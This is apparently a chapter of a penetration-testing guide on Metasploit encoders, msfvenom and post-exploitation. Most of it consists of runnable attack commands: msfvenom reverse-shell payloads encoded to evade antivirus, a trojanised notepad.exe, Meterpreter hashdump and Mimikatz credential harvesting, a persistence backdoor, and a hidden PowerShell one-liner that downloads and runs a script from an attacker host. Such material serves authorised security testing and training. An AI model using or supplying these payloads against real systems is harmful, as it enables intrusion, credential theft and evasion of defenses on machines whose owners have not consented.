Encoders & Msfvenom: Advanced Exploitation Techniques

Overview

Advanced exploitation techniques enhance the effectiveness of penetration tests by improving stealth, overcoming security defenses, and customizing payloads. This chapter covers the use of encoders, the msfvenom tool, and post-exploitation workflows to maximize the utility of Metasploit.

Encoders in Metasploit

Purpose of Encoders:

  • Modify payloads to bypass antivirus (AV) and intrusion detection systems (IDS).

  • Adapt payloads to specific environments by removing incompatible characters (e.g., null bytes).

Popular Encoders:

  1. Shikata Ga Nai:

    • Most widely used encoder for x86 architectures.

    • Translates to "It cannot be helped" in Japanese, reflecting its reliability in bypassing AV.

    • Example:

      msfvenom -e x86/shikata_ga_nai -i 5 -f exe
  2. Other Encoders:

    • x64/xor_dynamic: XOR-based encoder for 64-bit payloads.

    • cmd/powershell_base64: Encodes commands in Base64 for PowerShell environments.

Encoding a Payload:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker_IP> LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe > payload.exe

Using msfvenom

What is msfvenom?

  • A tool for generating and encoding custom payloads.

  • Replaced the older msfpayload and msfencode utilities.

Key Features:

  • Generates shellcode, standalone executables, and scripts.

  • Encodes payloads to evade detection.

  • Customizable formats for different platforms.

Basic Syntax:

msfvenom -p <payload> LHOST=<ip> LPORT=<port> -f <format> > <output_file>

Common Options:

Option
Description

-p

Specifies the payload.

LHOST

Attacker's IP address.

LPORT

Listening port for the payload.

-f

Output format (e.g., exe, aspx, raw).

-e

Encoder to use.

-i

Number of encoding iterations.

Examples of msfvenom Usage

  1. Generate a Reverse Shell for Windows:

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe > reverse_shell.exe
  2. Create a Web Exploit (ASP.NET):

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f aspx > exploit.aspx
  3. Encode a Payload with Shikata Ga Nai:

    msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -e x86/shikata_ga_nai -i 3 -f elf > payload.elf
  4. Custom Payload with Bad Character Exclusion:

    msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.10 LPORT=1337 -b "\x00\x0a\x0d" -f exe > clean_payload.exe

Post-Exploitation Techniques

Once an exploit succeeds, post-exploitation focuses on maintaining access, gathering information, and preparing for further attacks.

  1. Privilege Escalation:

    • Use local_exploit_suggester to identify potential privilege escalation exploits.

      use post/multi/recon/local_exploit_suggester
      set SESSION <session_id>
      run
  2. Gathering Credentials:

    • Extract password hashes or cleartext credentials:

      meterpreter > hashdump
    • Use tools like Mimikatz for advanced credential harvesting:

      meterpreter > load mimikatz
      mimikatz_command -f "sekurlsa::logonpasswords"
  3. Persistence:

    • Create a persistent backdoor on the target system:

      use exploit/windows/local/persistence
      set SESSION <session_id>
      set LPORT 4445
      run
  4. Data Exfiltration:

    • Download files from the target system:

      meterpreter > download <target_file> <local_path>
  5. Lateral Movement:

    • Use post-exploitation modules to pivot to other systems in the network:

      use auxiliary/scanner/smb/smb_login

Bypassing AV and IDS

Techniques for Evasion:

  1. Encoding with msfvenom:

    • Use multiple iterations of encoding to obfuscate payloads:

      msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=8080 -e x86/shikata_ga_nai -i 10 -f exe > stealth_payload.exe
  2. Template Injection:

    • Embed payloads into legitimate executables:

      msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=8080 -x notepad.exe -k -f exe > infected_notepad.exe
  3. Memory-Only Execution:

    • Leverage in-memory execution techniques to avoid writing files to disk.

  4. Obfuscation:

    • Use PowerShell or scripting techniques to hide payload execution:

      powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://<attacker_IP>/payload.ps1')"

Command Cheatsheet

Command
Description

msfvenom

Generate and encode payloads.

use post/multi/recon/local_exploit_suggester

Suggest privilege escalation exploits.

meterpreter > hashdump

Extract password hashes from the target.

meterpreter > load mimikatz

Load Mimikatz for credential harvesting.

meterpreter > download <file>

Download files from the target system.

msfconsole -q

Launch Metasploit in quiet mode.